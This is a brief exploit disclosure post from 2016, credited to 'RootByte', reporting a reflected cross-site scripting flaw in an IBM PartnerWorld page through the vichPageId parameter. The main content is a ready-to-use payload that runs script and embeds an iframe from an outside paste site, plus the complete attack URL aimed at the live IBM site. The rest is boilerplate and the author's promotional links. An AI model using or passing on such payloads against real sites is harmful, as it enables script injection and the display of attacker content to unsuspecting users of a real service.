IBM Security Website Cross Site Scripting
Posted on 08 February 2016
# Exploit Title: IBM Security WebSite Cross-Site Scripting # Google Dork: N/A # Date: 2016/2/5 # Exploit Author: RootByte # Vendor Homepage: www.ibm.com/security/ # Software Link: N/A # Version: N/A # Tested on: Windows 10 / FireFox 44.0 # CVE : N/A ~ # about (Wikipedia): International Business Machines Corporation (commonly referred to as IBM) is an American multinational technology and consulting corporation, with corporate headquarters in Armonk, New York. IBM manufactures and markets computer hardware, middleware and software, and offers infrastructure, hosting and consulting services in areas ranging from mainframe computers to nanotechnology. # POC: ~ # Vulnerable Location: http://www-03.ibm.com/partnerworld/wps/ File: pwselector.jsp ~ # Variable: vichPageId ~ # Using this script for XSS Vunerability Testing: "><script>alert('XSSPOSED')</script><center>RootByte<br><iframe src="http://paste.c99.nl/5c4fd8e6432edd5879dd.html" width="800" height="600"</iframe></center> ~ # Our Finally address is: http://www-03.ibm.com/partnerworld/wps/pwselector.jsp?CS=yes&vichPageId="><script>alert('XSSPOSED')</script><center>RootByte<br><iframe src="http://paste.c99.nl/5c4fd8e6432edd5879dd.html" width="800" height="600"</iframe></center> # Discovered by: RootByte # FanPage: https://www.facebook.com/Rootbyte/ # FB Group: https://www.facebook.com/groups/RootByte/ # Twitter: https://twitter.com/rootbytemx InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.